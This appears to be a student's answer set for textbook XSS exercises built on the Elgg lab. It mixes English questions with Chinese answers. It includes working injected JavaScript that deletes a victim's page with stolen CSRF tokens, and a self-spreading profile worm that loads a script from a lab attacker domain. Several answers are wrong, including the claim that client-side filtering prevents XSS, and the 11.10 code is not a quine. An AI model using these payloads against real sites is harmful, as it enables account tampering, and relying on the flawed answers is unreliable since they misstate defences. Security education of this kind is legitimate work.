Web_XSS_ex

11.1. Using LiveHTTPHeader, we find out that the following GET request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php?pageid=5
GET /delete.php?pageid=5
Host: www.example.com
...

Please write a malicious JavaScript program, which can delete a page owned by the victim if the program is injected into one of the victim’s page from www.example.com.

<script type="text/javascript">
    window.onload = function () {
        var Ajax=null;
        var sendurl="http://www.example.com/delete.php?pageid=5";
        Ajax=new XMLHttpRequest();
        Ajax.open("GET",sendurl,true);
        Ajax.setRequestHeader("Host","www.example.com");
        Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        Ajax.send();
    }
</script>

11.2. Using LiveHTTPHeader, we find out that the following POST request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php
POST /delete.php HTTP/1.1
Host: www.example.com
...
Content-Length: 8
pageid=5

Please write a malicious JavaScript program, which can delete a page owned by the victim if the program is injected into one of the victim’s page from www.example.com.

<script type="text/javascript">
    window.onload = function () {
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content=ts+token+"&pageid=5";
        var samyGuid=47; //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=new XMLHttpRequest();
            var sendurl="http://www.example.com/delete.php";
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.example.com");
            Ajax.setRequestHeader("Content-Type","application/x-www-formurlencoded");
            Ajax.send(content);
        }
    }
</script>

11.3. In Listing C.2 of the book (C is the chapter number of the XSS chapter; its actual value depends on which version of the book you are using), we added a check before sending the Ajax request to modify Samy’s own profile. What is the main purpose of this check? If we do not add this check, can the attack be successful? How come we do not have such a check in the add-friend attack (Listing 10.1)?

如果没有该判断,当samy把攻击代码放入他自己的个人主页后,修改过的内容会立刻显示出来,导致主页中的攻击代码立刻得到执行,把samy的主页内容改成“samy is my hero”,原来的攻击代码就被覆盖掉

11.4. To defeat XSS attacks, a developer decides to implement filtering on the browser side. Basically, the developer plans to add JavaScript code on each page, so before data are sent to the server, it filters out any JavaScript code contained inside the data. Let’s assume that the filtering logic can be made perfect. Can this approach prevent XSS attacks?

是的。由于XSS攻击的关键是在受害者的浏览器中嵌入恶意javascript代码,因此阻止任何javascript被上传无疑也会阻止任何javascript被下载。

11.5. What are the differences between XSS and CSRF attacks?

CSRF攻击源于与目标页不同,而XSS攻击源于同一页。XSS攻击还涉及将javascript代码注入页面。

11.6. Can the secret token countermeasure be used to defeat XSS attacks?

不,因为注入的javascript可以做受害者页面通常可以做的任何事情,所以它可以轻松地访问秘密令牌并向服务器发送请求。

11.7. Can the same-site cookie countermeasure for CSRF attacks be used to defeat XSS attacks?

不,XSS攻击发生在同一个站点,所以服务器不会怀疑任何事情。

11.8. To filter out JavaScript code from user input, can we just look for script tags, and remove them?

不,脚本标签不是嵌入javascript的唯一方法;HTML标记的许多属性还包括javascript代码。

11.9. If you can modify browser’s behavior, what would you add to browser, so you can help reduce the risks of XSS attacks?

对从页面发送的所有内容进行编码,以确保没有代码传输到服务器。

11.10. There are two typical ways for a program to produce a copy of itself. One way is to get a copy of itself from outside, such as from the underlying system (e.g., files, DOM nodes) and from the network. Another way is not to use any help from outside, but instead generate a copy of itself entirely from the code. There is a name for this approach: it is called a quine program, which, according to Wikipedia, “is a non-empty computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs, self-reproducing programs, and selfcopying programs.” The self-replicating JavaScript program shown in Listing 10.3 is not a quine, because it uses document.getElementById() to take an input from the underlying system.
Please write a quine program, and put it in a user’s profile in Elgg. When anybody visits this profile, the code will be executed, and it prints out a copy of itself in an alert window. The Wikipedia site has examples of quine programs in a variety of programming languages.
If you really want to challenge yourself, please rewrite the code in Listing 10.3, so it is a quine program, and it can do what exactly the code in Listing 10.3 can do, i.e., adding a statement and a copy of the worm to the victim’s profile.

<script type="text/javascript">
    window.onload = function () {
        var userName=elgg.session.user.name;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var sendurl="http://www.xsslabelgg.com/action/profile/edit";
        var desc="<p><b>been attacked!!!<\/b><\/p><script type=\"text\/javascript\"
        src=\"http:\/\/www.csrflabattacker.com\/task6.js\"><\/script>";
        var content="name="+userName+ts+token+"&description="+desc;
        var samyGuid=47; //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=new XMLHttpRequest();
            var sendurl="http://www.xsslabelgg.com/action/profile/edit";
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type","application/x-www-formurlencoded");
            Ajax.send(content);
        }
    }
</script>

11.11. The fundamental cause of XSS vulnerabilities is that HTML allows JavaScript code to be mixed with data. From the security perspective, mixing code with data is very dangerous. XSS gives us an example. Please provide two other examples that can be used to demonstrate that mixing code with data is bad for security.

将代码与数据混合对安全性有害案例:

格式字符串漏洞及利用。
缓冲区溢出攻击。
shell-shock攻击。
SQL注入攻击。

11.12. Why is the CSP (Content Security Policy) effective in defeating the Cross-Site Scripting attack? What is the downside of this approach?

告诉浏览器那些来源是可以信任的

csp的代价是吧javascript代码和html网页彻底分离,这给开发者带来了诸多不便

11.13. Can CSP (Content Security Policy) be used to defeat CSRF attacks? Why or why not?

不能 CSRF是在恶意网站上发出请求的 与csp无关

11.14. The following PHP code returns a web page. It also sets the CSP (Content Security Policy) for the JavaScript code running inside the page. Which JavaScript code is allowed to execute inside this page.

<?php
$cspheader = "Content-Security-Policy:".
    "default-src ’self’;".
    "script-src ’self’ ’nonce-1rA2345’ ’example.com’".
    "";
header($cspheader);
?>
<html>
    <script type="text/javascript" nonce="1rA2345">
        ... JavaScript Code ... ①
    </script>
    <script type="text/javascript" nonce="2rB3333">
        ... JavaScript Code ... ②
    </script>
    <script type="text/javascript">
        ... JavaScript Code ... ③
    </script>
    <script src="script.js"> </script> ④
    <script src="https://example.com/script2.js"> </script> ⑤
    <button onclick="alert(’hello’)">Click me</button> ⑥
</html>

①④⑤

上一篇:常见的Web安全漏洞及测试方法介绍


下一篇:绝对干货!src漏洞挖掘经验分享